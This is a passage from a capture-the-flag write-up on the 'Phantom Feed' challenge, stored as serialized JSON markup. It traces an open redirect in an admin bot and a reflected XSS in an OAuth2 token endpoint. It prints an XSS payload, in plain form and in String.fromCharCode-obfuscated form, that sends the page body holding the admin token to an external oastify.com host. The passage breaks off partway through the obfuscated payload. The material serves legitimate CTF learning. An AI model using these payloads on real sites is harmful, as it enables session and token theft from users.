",{"type":32,"tag":78,"props":2402,"children":2403},{"style":471},[2404],{"type":37,"value":624},{"type":32,"tag":78,"props":2406,"children":2407},{"style":607},[2408],{"type":37,"value":2409}," Options",{"type":32,"tag":78,"props":2411,"children":2412},{"style":471},[2413],{"type":37,"value":1170},{"type":32,"tag":78,"props":2415,"children":2416},{"class":80,"line":99},[2417,2422,2426],{"type":32,"tag":78,"props":2418,"children":2419},{"style":471},[2420],{"type":37,"value":2421}," [",{"type":32,"tag":78,"props":2423,"children":2424},{"style":593},[2425],{"type":37,"value":596},{"type":32,"tag":78,"props":2427,"children":2428},{"style":471},[2429],{"type":37,"value":601},{"type":32,"tag":78,"props":2431,"children":2432},{"class":80,"line":108},[2433,2438,2442,2447,2451,2456,2460,2465,2469,2474],{"type":32,"tag":78,"props":2434,"children":2435},{"style":607},[2436],{"type":37,"value":2437},"    client 
",{"type":32,"tag":78,"props":2439,"children":2440},{"style":471},[2441],{"type":37,"value":624},{"type":32,"tag":78,"props":2443,"children":2444},{"style":607},[2445],{"type":37,"value":2446}," webdriver",{"type":32,"tag":78,"props":2448,"children":2449},{"style":471},[2450],{"type":37,"value":485},{"type":32,"tag":78,"props":2452,"children":2453},{"style":607},[2454],{"type":37,"value":2455},"Chrome",{"type":32,"tag":78,"props":2457,"children":2458},{"style":471},[2459],{"type":37,"value":495},{"type":32,"tag":78,"props":2461,"children":2462},{"style":519},[2463],{"type":37,"value":2464},"options",{"type":32,"tag":78,"props":2466,"children":2467},{"style":471},[2468],{"type":37,"value":624},{"type":32,"tag":78,"props":2470,"children":2471},{"style":607},[2472],{"type":37,"value":2473},"chrome_options",{"type":32,"tag":78,"props":2475,"children":2476},{"style":471},[2477],{"type":37,"value":722},{"type":32,"tag":78,"props":2479,"children":2480},{"class":80,"line":117},[2481,2486,2490,2495,2499,2503,2508,2512],{"type":32,"tag":78,"props":2482,"children":2483},{"style":607},[2484],{"type":37,"value":2485},"    
client",{"type":32,"tag":78,"props":2487,"children":2488},{"style":471},[2489],{"type":37,"value":485},{"type":32,"tag":78,"props":2491,"children":2492},{"style":607},[2493],{"type":37,"value":2494},"get",{"type":32,"tag":78,"props":2496,"children":2497},{"style":471},[2498],{"type":37,"value":495},{"type":32,"tag":78,"props":2500,"children":2501},{"style":498},[2502],{"type":37,"value":501},{"type":32,"tag":78,"props":2504,"children":2505},{"style":504},[2506],{"type":37,"value":2507},"http://127.0.0.1:5000",{"type":32,"tag":78,"props":2509,"children":2510},{"style":498},[2511],{"type":37,"value":501},{"type":32,"tag":78,"props":2513,"children":2514},{"style":471},[2515],{"type":37,"value":722},{"type":32,"tag":78,"props":2517,"children":2518},{"class":80,"line":126},[2519],{"type":32,"tag":78,"props":2520,"children":2521},{"emptyLinePlaceholder":157},[2522],{"type":37,"value":160},{"type":32,"tag":78,"props":2524,"children":2525},{"class":80,"line":135},[2526,2531,2535,2540,2544,2549,2553,2557,2562,2566],{"type":32,"tag":78,"props":2527,"children":2528},{"style":607},[2529],{"type":37,"value":2530},"    token ",{"type":32,"tag":78,"props":2532,"children":2533},{"style":471},[2534],{"type":37,"value":624},{"type":32,"tag":78,"props":2536,"children":2537},{"style":607},[2538],{"type":37,"value":2539}," 
create_jwt",{"type":32,"tag":78,"props":2541,"children":2542},{"style":471},[2543],{"type":37,"value":495},{"type":32,"tag":78,"props":2545,"children":2546},{"style":918},[2547],{"type":37,"value":2548},"1",{"type":32,"tag":78,"props":2550,"children":2551},{"style":471},[2552],{"type":37,"value":516},{"type":32,"tag":78,"props":2554,"children":2555},{"style":498},[2556],{"type":37,"value":549},{"type":32,"tag":78,"props":2558,"children":2559},{"style":504},[2560],{"type":37,"value":2561},"administrator",{"type":32,"tag":78,"props":2563,"children":2564},{"style":498},[2565],{"type":37,"value":501},{"type":32,"tag":78,"props":2567,"children":2568},{"style":471},[2569],{"type":37,"value":722},{"type":32,"tag":78,"props":2571,"children":2572},{"class":80,"line":144},[2573,2578,2582],{"type":32,"tag":78,"props":2574,"children":2575},{"style":607},[2576],{"type":37,"value":2577},"    cookie ",{"type":32,"tag":78,"props":2579,"children":2580},{"style":471},[2581],{"type":37,"value":624},{"type":32,"tag":78,"props":2583,"children":2584},{"style":471},[2585],{"type":37,"value":2586}," {\n",{"type":32,"tag":78,"props":2588,"children":2589},{"class":80,"line":153},[2590,2595,2600,2604,2608,2612,2617,2621],{"type":32,"tag":78,"props":2591,"children":2592},{"style":498},[2593],{"type":37,"value":2594},"        
\"",{"type":32,"tag":78,"props":2596,"children":2597},{"style":504},[2598],{"type":37,"value":2599},"name",{"type":32,"tag":78,"props":2601,"children":2602},{"style":498},[2603],{"type":37,"value":501},{"type":32,"tag":78,"props":2605,"children":2606},{"style":471},[2607],{"type":37,"value":1106},{"type":32,"tag":78,"props":2609,"children":2610},{"style":498},[2611],{"type":37,"value":549},{"type":32,"tag":78,"props":2613,"children":2614},{"style":504},[2615],{"type":37,"value":2616},"token",{"type":32,"tag":78,"props":2618,"children":2619},{"style":498},[2620],{"type":37,"value":501},{"type":32,"tag":78,"props":2622,"children":2623},{"style":471},[2624],{"type":37,"value":2625},",\n",{"type":32,"tag":78,"props":2627,"children":2628},{"class":80,"line":163},[2629,2633,2638,2642,2646,2651],{"type":32,"tag":78,"props":2630,"children":2631},{"style":498},[2632],{"type":37,"value":2594},{"type":32,"tag":78,"props":2634,"children":2635},{"style":504},[2636],{"type":37,"value":2637},"value",{"type":32,"tag":78,"props":2639,"children":2640},{"style":498},[2641],{"type":37,"value":501},{"type":32,"tag":78,"props":2643,"children":2644},{"style":471},[2645],{"type":37,"value":1106},{"type":32,"tag":78,"props":2647,"children":2648},{"style":607},[2649],{"type":37,"value":2650}," 
token",{"type":32,"tag":78,"props":2652,"children":2653},{"style":471},[2654],{"type":37,"value":2625},{"type":32,"tag":78,"props":2656,"children":2657},{"class":80,"line":172},[2658,2662,2667,2671,2675,2679,2684,2688],{"type":32,"tag":78,"props":2659,"children":2660},{"style":498},[2661],{"type":37,"value":2594},{"type":32,"tag":78,"props":2663,"children":2664},{"style":504},[2665],{"type":37,"value":2666},"domain",{"type":32,"tag":78,"props":2668,"children":2669},{"style":498},[2670],{"type":37,"value":501},{"type":32,"tag":78,"props":2672,"children":2673},{"style":471},[2674],{"type":37,"value":1106},{"type":32,"tag":78,"props":2676,"children":2677},{"style":498},[2678],{"type":37,"value":549},{"type":32,"tag":78,"props":2680,"children":2681},{"style":504},[2682],{"type":37,"value":2683},"127.0.0.1",{"type":32,"tag":78,"props":2685,"children":2686},{"style":498},[2687],{"type":37,"value":501},{"type":32,"tag":78,"props":2689,"children":2690},{"style":471},[2691],{"type":37,"value":2625},{"type":32,"tag":78,"props":2693,"children":2694},{"class":80,"line":181},[2695,2699,2704,2708,2712,2716,2721,2725],{"type":32,"tag":78,"props":2696,"children":2697},{"style":498},[2698],{"type":37,"value":2594},{"type":32,"tag":78,"props":2700,"children":2701},{"style":504},[2702],{"type":37,"value":2703},"path",{"type":32,"tag":78,"props":2705,"children":2706},{"style":498},[2707],{"type":37,"value":501},{"type":32,"tag":78,"props":2709,"children":2710},{"style":471},[2711],{"type":37,"value":1106},{"type":32,"tag":78,"props":2713,"children":2714},{"style":498},[2715],{"type":37,"value":549},{"type":32,"tag":78,"props":2717,"children":2718},{"style":504},[2719],{"type":37,"value":2720},"/",{"type":32,"tag":78,"props":2722,"children":2723},{"style":498},[2724],{"type":37,"value":501},{"type":32,"tag":78,"props":2726,"children":2727},{"style":471},[2728],{"type":37,"value":2625},{"type":32,"tag":78,"props":2730,"children":2731},{"class":80,"line":190},[2732,2736,2741,2745,2749,275
4,2758,2762,2766,2770,2774,2778,2783,2788,2792,2796,2801,2805,2810,2814,2819,2824,2829],{"type":32,"tag":78,"props":2733,"children":2734},{"style":498},[2735],{"type":37,"value":2594},{"type":32,"tag":78,"props":2737,"children":2738},{"style":504},[2739],{"type":37,"value":2740},"expiry",{"type":32,"tag":78,"props":2742,"children":2743},{"style":498},[2744],{"type":37,"value":501},{"type":32,"tag":78,"props":2746,"children":2747},{"style":471},[2748],{"type":37,"value":1106},{"type":32,"tag":78,"props":2750,"children":2751},{"style":1257},[2752],{"type":37,"value":2753}," int",{"type":32,"tag":78,"props":2755,"children":2756},{"style":471},[2757],{"type":37,"value":1747},{"type":32,"tag":78,"props":2759,"children":2760},{"style":607},[2761],{"type":37,"value":2145},{"type":32,"tag":78,"props":2763,"children":2764},{"style":471},[2765],{"type":37,"value":485},{"type":32,"tag":78,"props":2767,"children":2768},{"style":607},[2769],{"type":37,"value":2145},{"type":32,"tag":78,"props":2771,"children":2772},{"style":471},[2773],{"type":37,"value":485},{"type":32,"tag":78,"props":2775,"children":2776},{"style":607},[2777],{"type":37,"value":2154},{"type":32,"tag":78,"props":2779,"children":2780},{"style":471},[2781],{"type":37,"value":2782},"()",{"type":32,"tag":78,"props":2784,"children":2785},{"style":569},[2786],{"type":37,"value":2787}," 
+",{"type":32,"tag":78,"props":2789,"children":2790},{"style":607},[2791],{"type":37,"value":2136},{"type":32,"tag":78,"props":2793,"children":2794},{"style":471},[2795],{"type":37,"value":485},{"type":32,"tag":78,"props":2797,"children":2798},{"style":607},[2799],{"type":37,"value":2800},"timedelta",{"type":32,"tag":78,"props":2802,"children":2803},{"style":471},[2804],{"type":37,"value":495},{"type":32,"tag":78,"props":2806,"children":2807},{"style":519},[2808],{"type":37,"value":2809},"seconds",{"type":32,"tag":78,"props":2811,"children":2812},{"style":471},[2813],{"type":37,"value":624},{"type":32,"tag":78,"props":2815,"children":2816},{"style":918},[2817],{"type":37,"value":2818},"1800",{"type":32,"tag":78,"props":2820,"children":2821},{"style":471},[2822],{"type":37,"value":2823},")).",{"type":32,"tag":78,"props":2825,"children":2826},{"style":607},[2827],{"type":37,"value":2828},"timestamp",{"type":32,"tag":78,"props":2830,"children":2831},{"style":471},[2832],{"type":37,"value":2833},"()),\n",{"type":32,"tag":78,"props":2835,"children":2836},{"class":80,"line":199},[2837,2841,2846,2850,2854,2858],{"type":32,"tag":78,"props":2838,"children":2839},{"style":498},[2840],{"type":37,"value":2594},{"type":32,"tag":78,"props":2842,"children":2843},{"style":504},[2844],{"type":37,"value":2845},"secure",{"type":32,"tag":78,"props":2847,"children":2848},{"style":498},[2849],{"type":37,"value":501},{"type":32,"tag":78,"props":2851,"children":2852},{"style":471},[2853],{"type":37,"value":1106},{"type":32,"tag":78,"props":2855,"children":2856},{"style":833},[2857],{"type":37,"value":1136},{"type":32,"tag":78,"props":2859,"children":2860},{"style":471},[2861],{"type":37,"value":2625},{"type":32,"tag":78,"props":2863,"children":2864},{"class":80,"line":207},[2865,2869,2874,2878,2882],{"type":32,"tag":78,"props":2866,"children":2867},{"style":498},[2868],{"type":37,"value":2594},{"type":32,"tag":78,"props":2870,"children":2871},{"style":504},[2872],{"type":37,"value":2873},"
httpOnly",{"type":32,"tag":78,"props":2875,"children":2876},{"style":498},[2877],{"type":37,"value":501},{"type":32,"tag":78,"props":2879,"children":2880},{"style":471},[2881],{"type":37,"value":1106},{"type":32,"tag":78,"props":2883,"children":2884},{"style":833},[2885],{"type":37,"value":2886}," True\n",{"type":32,"tag":78,"props":2888,"children":2889},{"class":80,"line":215},[2890],{"type":32,"tag":78,"props":2891,"children":2892},{"style":471},[2893],{"type":37,"value":247},{"type":32,"tag":78,"props":2895,"children":2896},{"class":80,"line":224},[2897,2901,2905,2910,2914,2919],{"type":32,"tag":78,"props":2898,"children":2899},{"style":607},[2900],{"type":37,"value":2485},{"type":32,"tag":78,"props":2902,"children":2903},{"style":471},[2904],{"type":37,"value":485},{"type":32,"tag":78,"props":2906,"children":2907},{"style":607},[2908],{"type":37,"value":2909},"add_cookie",{"type":32,"tag":78,"props":2911,"children":2912},{"style":471},[2913],{"type":37,"value":495},{"type":32,"tag":78,"props":2915,"children":2916},{"style":607},[2917],{"type":37,"value":2918},"cookie",{"type":32,"tag":78,"props":2920,"children":2921},{"style":471},[2922],{"type":37,"value":722},{"type":32,"tag":78,"props":2924,"children":2925},{"class":80,"line":233},[2926],{"type":32,"tag":78,"props":2927,"children":2928},{"emptyLinePlaceholder":157},[2929],{"type":37,"value":160},{"type":32,"tag":78,"props":2931,"children":2932},{"class":80,"line":241},[2933,2937,2941,2945,2949,2953,2957,2961,2965,2970,2974],{"type":32,"tag":78,"props":2934,"children":2935},{"style":607},[2936],{"type":37,"value":2485},{"type":32,"tag":78,"props":2938,"children":2939},{"style":471},[2940],{"type":37,"value":485},{"type":32,"tag":78,"props":2942,"children":2943},{"style":607},[2944],{"type":37,"value":2494},{"type":32,"tag":78,"props":2946,"children":2947},{"style":471},[2948],{"type":37,"value":495},{"type":32,"tag":78,"props":2950,"children":2951},{"style":498},[2952],{"type":37,"value":501},{"type":32,"tag":
78,"props":2954,"children":2955},{"style":504},[2956],{"type":37,"value":2507},{"type":32,"tag":78,"props":2958,"children":2959},{"style":498},[2960],{"type":37,"value":501},{"type":32,"tag":78,"props":2962,"children":2963},{"style":569},[2964],{"type":37,"value":2787},{"type":32,"tag":78,"props":2966,"children":2967},{"style":607},[2968],{"type":37,"value":2969}," link",{"type":32,"tag":78,"props":2971,"children":2972},{"style":471},[2973],{"type":37,"value":670},{"type":32,"tag":78,"props":2975,"children":2976},{"style":673},[2977],{"type":37,"value":2978}," # \u003C--- Here is the open redirect\n",{"type":32,"tag":78,"props":2980,"children":2981},{"class":80,"line":250},[2982,2987,2991,2996,3000,3005],{"type":32,"tag":78,"props":2983,"children":2984},{"style":607},[2985],{"type":37,"value":2986},"    time",{"type":32,"tag":78,"props":2988,"children":2989},{"style":471},[2990],{"type":37,"value":485},{"type":32,"tag":78,"props":2992,"children":2993},{"style":607},[2994],{"type":37,"value":2995},"sleep",{"type":32,"tag":78,"props":2997,"children":2998},{"style":471},[2999],{"type":37,"value":495},{"type":32,"tag":78,"props":3001,"children":3002},{"style":918},[3003],{"type":37,"value":3004},"10",{"type":32,"tag":78,"props":3006,"children":3007},{"style":471},[3008],{"type":37,"value":722},{"type":32,"tag":78,"props":3010,"children":3012},{"class":80,"line":3011},21,[3013,3017,3021,3026],{"type":32,"tag":78,"props":3014,"children":3015},{"style":607},[3016],{"type":37,"value":2485},{"type":32,"tag":78,"props":3018,"children":3019},{"style":471},[3020],{"type":37,"value":485},{"type":32,"tag":78,"props":3022,"children":3023},{"style":607},[3024],{"type":37,"value":3025},"quit",{"type":32,"tag":78,"props":3027,"children":3028},{"style":471},[3029],{"type":37,"value":1170},{"type":32,"tag":46,"props":3031,"children":3032},{},[3033],{"type":37,"value":3034},"Furthermore, it is important to note that this bot has an administrator token in its cookie. 
However, this token can only be used on the service on port 3000. We need to find a way to have a valid token on port 4000. This is what we will detail in the next chapter.",{"type":32,"tag":39,"props":3036,"children":3038},{"id":3037},"oauth2-into-xss",[3039],{"type":37,"value":3040},"Oauth2 into XSS",{"type":32,"tag":46,"props":3042,"children":3043},{},[3044,3046,3052],{"type":37,"value":3045},"The routes of the service on port 4000 are only accessible via the header ",{"type":32,"tag":74,"props":3047,"children":3049},{"className":3048},[],[3050],{"type":37,"value":3051},"Authorization: Bearer \u003CJWT>",{"type":37,"value":3053},". The JWT must be generated beforehand using the oauth2 functionality located on port 3000.",{"type":32,"tag":46,"props":3055,"children":3056},{},[3057],{"type":37,"value":3058},"We will detail these routes below:",{"type":32,"tag":290,"props":3060,"children":3061},{},[3062],{"type":32,"tag":294,"props":3063,"children":3064},{},[3065,3071,3072,3076,3082,3084,3087,3092,3094,3097,3102],{"type":32,"tag":74,"props":3066,"children":3068},{"className":3067},[],[3069],{"type":37,"value":3070},"/oauth2/auth",{"type":37,"value":1106},{"type":32,"tag":3073,"props":3074,"children":3075},"br",{},[],{"type":32,"tag":3077,"props":3078,"children":3079},"em",{},[3080],{"type":37,"value":3081},"Method",{"type":37,"value":3083},": GET",{"type":32,"tag":3073,"props":3085,"children":3086},{},[],{"type":32,"tag":3077,"props":3088,"children":3089},{},[3090],{"type":37,"value":3091},"Parameters",{"type":37,"value":3093},": client_id, redirect_url",{"type":32,"tag":3073,"props":3095,"children":3096},{},[],{"type":32,"tag":3077,"props":3098,"children":3099},{},[3100],{"type":37,"value":3101},"Description",{"type":37,"value":3103},": This route generates an OAuth2 authorization page using the \"oauth2.html\" template. It passes in the title, client_id, and redirect_url as variables to the template. 
This page is likely where the user would enter their credentials to authorize the OAuth2 request.",{"type":32,"tag":33,"props":3105,"children":3106},{"id":7},[],{"type":32,"tag":290,"props":3108,"children":3109},{},[3110],{"type":32,"tag":294,"props":3111,"children":3112},{},[3113,3119,3120,3123,3127,3128,3131,3135,3136,3139,3143],{"type":32,"tag":74,"props":3114,"children":3116},{"className":3115},[],[3117],{"type":37,"value":3118},"oauth2/code",{"type":37,"value":1106},{"type":32,"tag":3073,"props":3121,"children":3122},{},[],{"type":32,"tag":3077,"props":3124,"children":3125},{},[3126],{"type":37,"value":3081},{"type":37,"value":3083},{"type":32,"tag":3073,"props":3129,"children":3130},{},[],{"type":32,"tag":3077,"props":3132,"children":3133},{},[3134],{"type":37,"value":3091},{"type":37,"value":3093},{"type":32,"tag":3073,"props":3137,"children":3138},{},[],{"type":32,"tag":3077,"props":3140,"children":3141},{},[3142],{"type":37,"value":3101},{"type":37,"value":3144},": This route constructs a URL containing the authorization code as a query parameter and redirects the user to this URL using a 303 status code. This is typically the URL of the client application that initiated the OAuth2 request. 
The client application can then use this authorization code to request an access token from the server.",{"type":32,"tag":33,"props":3146,"children":3148},{"id":3147},"_1",[],{"type":32,"tag":290,"props":3150,"children":3151},{},[3152],{"type":32,"tag":294,"props":3153,"children":3154},{},[3155,3161,3162,3165,3169,3170,3173,3177,3179,3182,3186,3188,3192,3195,3200],{"type":32,"tag":74,"props":3156,"children":3158},{"className":3157},[],[3159],{"type":37,"value":3160},"/oauth2/token",{"type":37,"value":1106},{"type":32,"tag":3073,"props":3163,"children":3164},{},[],{"type":32,"tag":3077,"props":3166,"children":3167},{},[3168],{"type":37,"value":3081},{"type":37,"value":3083},{"type":32,"tag":3073,"props":3171,"children":3172},{},[],{"type":32,"tag":3077,"props":3174,"children":3175},{},[3176],{"type":37,"value":3091},{"type":37,"value":3178},": client_id, redirect_url, authorization_code",{"type":32,"tag":3073,"props":3180,"children":3181},{},[],{"type":32,"tag":3077,"props":3183,"children":3184},{},[3185],{"type":37,"value":3101},{"type":37,"value":3187},": This route checks the validity of the provided authorization code. It retrieves the associated record from the database, verifies the client_id and redirect_url, and checks whether the authorization code has expired. If the authorization code is valid, it generates an access token and returns it to the client.",{"type":32,"tag":33,"props":3189,"children":3191},{"id":3190},"_2",[],{"type":32,"tag":3073,"props":3193,"children":3194},{},[],{"type":32,"tag":284,"props":3196,"children":3197},{},[3198],{"type":37,"value":3199},"Note: The client_id and redirect_url parameters need to match the values used to generate the authorization code.",{"type":32,"tag":33,"props":3201,"children":3203},{"id":3202},"_3",[],{"type":32,"tag":46,"props":3205,"children":3206},{},[3207,3209,3215,3217,3222],{"type":37,"value":3208},"If we recap, the routes that interest us are the last two. 
The flow that allows us to obtain a token for the service on port 4000 is as follows: we call the ",{"type":32,"tag":74,"props":3210,"children":3212},{"className":3211},[],[3213],{"type":37,"value":3214},"/oauth2/code",{"type":37,"value":3216}," route to initialize the oauth2 request; this route returns a 303 with the authorization code as a query parameter. Then we call the ",{"type":32,"tag":74,"props":3218,"children":3220},{"className":3219},[],[3221],{"type":37,"value":3160},{"type":37,"value":3223}," route with the authorization code to obtain a valid token.",{"type":32,"tag":46,"props":3225,"children":3226},{},[3227],{"type":37,"value":3228},"oauth2/code:",{"type":32,"tag":52,"props":3230,"children":3232},{"imgSrc":3231},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313648/writeups/phantom-feed/oauth2_code.webp",[],{"type":32,"tag":46,"props":3234,"children":3235},{},[3236],{"type":37,"value":3237},"oauth2/token:",{"type":32,"tag":52,"props":3239,"children":3241},{"imgSrc":3240},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313664/writeups/phantom-feed/oauth2_token.webp",[],{"type":32,"tag":46,"props":3243,"children":3244},{},[3245,3247,3253,3255,3261],{"type":37,"value":3246},"If we carefully examine the headers of the last request, we can see that the content type is: ",{"type":32,"tag":74,"props":3248,"children":3250},{"className":3249},[],[3251],{"type":37,"value":3252},"text/html",{"type":37,"value":3254},". 
Furthermore, the ",{"type":32,"tag":74,"props":3256,"children":3258},{"className":3257},[],[3259],{"type":37,"value":3260},"redirect_url",{"type":37,"value":3262}," is a parameter that we control and we can see that it is reflected in the response, indicating that this endpoint is vulnerable to XSS.",{"type":32,"tag":52,"props":3264,"children":3266},{"imgSrc":3265},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704313866/writeups/phantom-feed/content_type_response_token.webp",[],{"type":32,"tag":46,"props":3268,"children":3269},{},[3270],{"type":37,"value":3271},"In our case, it would be interesting to manipulate the bot by using an open redirect to force it to utilize this OAuth2 flow. By exploiting the XSS vulnerability when the token is generated and obtaining the HTML body, we can steal the admin token that is usable in the service at port 4000.",{"type":32,"tag":46,"props":3273,"children":3274},{},[3275],{"type":37,"value":3276},"To do this, we will use the following XSS payload to steal the body of the HTML:",{"type":32,"tag":63,"props":3278,"children":3280},{"lang":3279},"html",[3281],{"type":32,"tag":68,"props":3282,"children":3285},{"className":3283,"code":3284,"language":3279,"meta":7,"style":7},"language-html shiki shiki-themes vitesse-dark","\u003Cimg src=x onerror='window.location = `http://lc1azv4ne9wwxnmfx2bzw6zdj4p2dt1i.oastify.com/?body=${btoa(document.body.innerHTML)}`'>\n",[3286],{"type":32,"tag":74,"props":3287,"children":3288},{"__ignoreMap":7},[3289],{"type":32,"tag":78,"props":3290,"children":3291},{"class":80,"line":81},[3292,3297,3302,3307,3311,3316,3321,3325,3330,3335,3339,3344,3348,3353,3358,3363,3367],{"type":32,"tag":78,"props":3293,"children":3294},{"style":471},[3295],{"type":37,"value":3296},"\u003C",{"type":32,"tag":78,"props":3298,"children":3299},{"style":833},[3300],{"type":37,"value":3301},"img",{"type":32,"tag":78,"props":3303,"children":3304},{"style":519},[3305],{"type":37,"value":3306}," 
src",{"type":32,"tag":78,"props":3308,"children":3309},{"style":471},[3310],{"type":37,"value":624},{"type":32,"tag":78,"props":3312,"children":3313},{"style":504},[3314],{"type":37,"value":3315},"x",{"type":32,"tag":78,"props":3317,"children":3318},{"style":519},[3319],{"type":37,"value":3320}," onerror",{"type":32,"tag":78,"props":3322,"children":3323},{"style":471},[3324],{"type":37,"value":624},{"type":32,"tag":78,"props":3326,"children":3327},{"style":498},[3328],{"type":37,"value":3329},"'",{"type":32,"tag":78,"props":3331,"children":3332},{"style":504},[3333],{"type":37,"value":3334},"window",{"type":32,"tag":78,"props":3336,"children":3337},{"style":471},[3338],{"type":37,"value":485},{"type":32,"tag":78,"props":3340,"children":3341},{"style":504},[3342],{"type":37,"value":3343},"location ",{"type":32,"tag":78,"props":3345,"children":3346},{"style":471},[3347],{"type":37,"value":624},{"type":32,"tag":78,"props":3349,"children":3350},{"style":498},[3351],{"type":37,"value":3352}," `",{"type":32,"tag":78,"props":3354,"children":3355},{"style":504},[3356],{"type":37,"value":3357},"http:",{"type":32,"tag":78,"props":3359,"children":3360},{"style":673},[3361],{"type":37,"value":3362},"//lc1azv4ne9wwxnmfx2bzw6zdj4p2dt1i.oastify.com/?body=${btoa(document.body.innerHTML)}`",{"type":32,"tag":78,"props":3364,"children":3365},{"style":498},[3366],{"type":37,"value":3329},{"type":32,"tag":78,"props":3368,"children":3369},{"style":471},[3370],{"type":37,"value":3371},">\n",{"type":32,"tag":46,"props":3373,"children":3374},{},[3375],{"type":37,"value":3376},"To ensure that the script is executed correctly, we will encode our payload with String.fromCharCode.",{"type":32,"tag":63,"props":3378,"children":3379},{"lang":3279},[3380],{"type":32,"tag":68,"props":3381,"children":3383},{"className":3283,"code":3382,"language":3279,"meta":7,"style":7},"\u003Cimg src=x 
onerror='eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,96,104,116,116,112,58,47,47,108,99,49,97,122,118,52,110,101,57,119,119,120,110,109,102,120,50,98,122,119,54,122,100,106,52,112,50,100,116,49,105,46,111,97,115,116,105,102,121,46,99,111,109,47,63,98,111,100,121,61,36,123,98,116,111,97,40,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,72,84,77,76,41,125,96))'>\n",[3384],{"type":32,"tag":74,"props":3385,"children":3386},{"__ignoreMap":7},[3387],{"type":32,"tag":78,"props":3388,"children":3389},{"class":80,"line":81},[3390,3394,3398,3402,3406,3410,3414,3418,3422,3427,3431,3435,3439,3444,3448,3453,3457,3462,3466,3471,3475,3480,3484,3489,3493,3497,3501,3506,3510,3515,3519,3523,3527,3532,3536,3541,3545,3550,3554,3558,3562,3566,3570,3574,3578,3583,3587,3592,3596,3600,3604,3609,3613,3618,3622,3626,3630,3634,3638,3643,3647,3652,3656,3661,3665,3669,3673,3677,3681,3685,3689,3694,3698,3702,3706,3711,3715,3720,3724,3729,3733,3737,3741,3746,3750,3755,3759,3763,3767,3771,3775,3780,3784,3788,3792,3797,3801,3806,3810,3814,3818,3823,3827,3832,3836,3840,3844,3848,3852,3857,3861,3865,3869,3873,3877,3882,3886,3890,3894,3898,3902,3906,3910,3914,3918,3922,3926,3930,3934,3938,3942,3946,3950,3954,3958,3962,3966,3971,3975,3979,3983,3987,3991,3995,3999,4004,4008,4012,4016,4020,4024,4028,4032,4036,4040,4044,4048,4053,4057,4061,4065,4069,4073,4077,4081,4085,4089,4093,4097,4102,4106,4111,4115,4119,4123,4127,4131,4135,4139,4143,4147,4152,4156,4160,4164,4168,4172,4176,4180,4185,4189,4193,4197,4201,4205,4209,4213,4217,4221,4225,4229,4233,4237,4241,4245,4249,4253,4257,4261,4265,4269,4273,4277,4281,4285,4289,4293,4297,4301,4306,4310,4315,4319,4324,4328,4333,4337,4342,4346,4351,4355,4360,4364,4368,4373,4377],{"type":32,"tag":78,"props":3391,"children":3392},{"style":471},[3393],{"type":37,"value":3296},{"type":32,"tag":78,"props":3395,"children":3396},{"style":833},[3397],{"type":37,"value":3301},{"type":32,"tag":78,"props":3399,
"children":3400},{"style":519},[3401],{"type":37,"value":3306},{"type":32,"tag":78,"props":3403,"children":3404},{"style":471},[3405],{"type":37,"value":624},{"type":32,"tag":78,"props":3407,"children":3408},{"style":504},[3409],{"type":37,"value":3315},{"type":32,"tag":78,"props":3411,"children":3412},{"style":519},[3413],{"type":37,"value":3320},{"type":32,"tag":78,"props":3415,"children":3416},{"style":471},[3417],{"type":37,"value":624},{"type":32,"tag":78,"props":3419,"children":3420},{"style":498},[3421],{"type":37,"value":3329},{"type":32,"tag":78,"props":3423,"children":3424},{"style":477},[3425],{"type":37,"value":3426},"eval",{"type":32,"tag":78,"props":3428,"children":3429},{"style":471},[3430],{"type":37,"value":495},{"type":32,"tag":78,"props":3432,"children":3433},{"style":504},[3434],{"type":37,"value":1325},{"type":32,"tag":78,"props":3436,"children":3437},{"style":471},[3438],{"type":37,"value":485},{"type":32,"tag":78,"props":3440,"children":3441},{"style":477},[3442],{"type":37,"value":3443},"fromCharCode",{"type":32,"tag":78,"props":3445,"children":3446},{"style":471},[3447],{"type":37,"value":495},{"type":32,"tag":78,"props":3449,"children":3450},{"style":918},[3451],{"type":37,"value":3452},"119",{"type":32,"tag":78,"props":3454,"children":3455},{"style":471},[3456],{"type":37,"value":516},{"type":32,"tag":78,"props":3458,"children":3459},{"style":918},[3460],{"type":37,"value":3461},"105",{"type":32,"tag":78,"props":3463,"children":3464},{"style":471},[3465],{"type":37,"value":516},{"type":32,"tag":78,"props":3467,"children":3468},{"style":918},[3469],{"type":37,"value":3470},"110",{"type":32,"tag":78,"props":3472,"children":3473},{"style":471},[3474],{"type":37,"value":516},{"type":32,"tag":78,"props":3476,"children":3477},{"style":918},[3478],{"type":37,"value":3479},"100",{"type":32,"tag":78,"props":3481,"children":3482},{"style":471},[3483],{"type":37,"value":516},{"type":32,"tag":78,"props":3485,"children":3486},{"style":918},[3487],{"typ
e":37,"value":3488},"111",{"type":32,"tag":78,"props":3490,"children":3491},{"style":471},[3492],{"type":37,"value":516},{"type":32,"tag":78,"props":3494,"children":3495},{"style":918},[3496],{"type":37,"value":3452},{"type":32,"tag":78,"props":3498,"children":3499},{"style":471},[3500],{"type":37,"value":516},{"type":32,"tag":78,"props":3502,"children":3503},{"style":918},[3504],{"type":37,"value":3505},"46",{"type":32,"tag":78,"props":3507,"children":3508},{"style":471},[3509],{"type":37,"value":516},{"type":32,"tag":78,"props":3511,"children":3512},{"style":918},[3513],{"type":37,"value":3514},"108",{"type":32,"tag":78,"props":3516,"children":3517},{"style":471},[3518],{"type":37,"value":516},{"type":32,"tag":78,"props":3520,"children":3521},{"style":918},[3522],{"type":37,"value":3488},{"type":32,"tag":78,"props":3524,"children":3525},{"style":471},[3526],{"type":37,"value":516},{"type":32,"tag":78,"props":3528,"children":3529},{"style":918},[3530],{"type":37,"value":3531},"99",{"type":32,"tag":78,"props":3533,"children":3534},{"style":471},[3535],{"type":37,"value":516},{"type":32,"tag":78,"props":3537,"children":3538},{"style":918},[3539],{"type":37,"value":3540},"97",{"type":32,"tag":78,"props":3542,"children":3543},{"style":471},[3544],{"type":37,"value":516},{"type":32,"tag":78,"props":3546,"children":3547},{"style":918},[3548],{"type":37,"value":3549},"116",{"type":32,"tag":78,"props":3551,"children":3552},{"style":471},[3553],{"type":37,"value":516},{"type":32,"tag":78,"props":3555,"children":3556},{"style":918},[3557],{"type":37,"value":3461},{"type":32,"tag":78,"props":3559,"children":3560},{"style":471},[3561],{"type":37,"value":516},{"type":32,"tag":78,"props":3563,"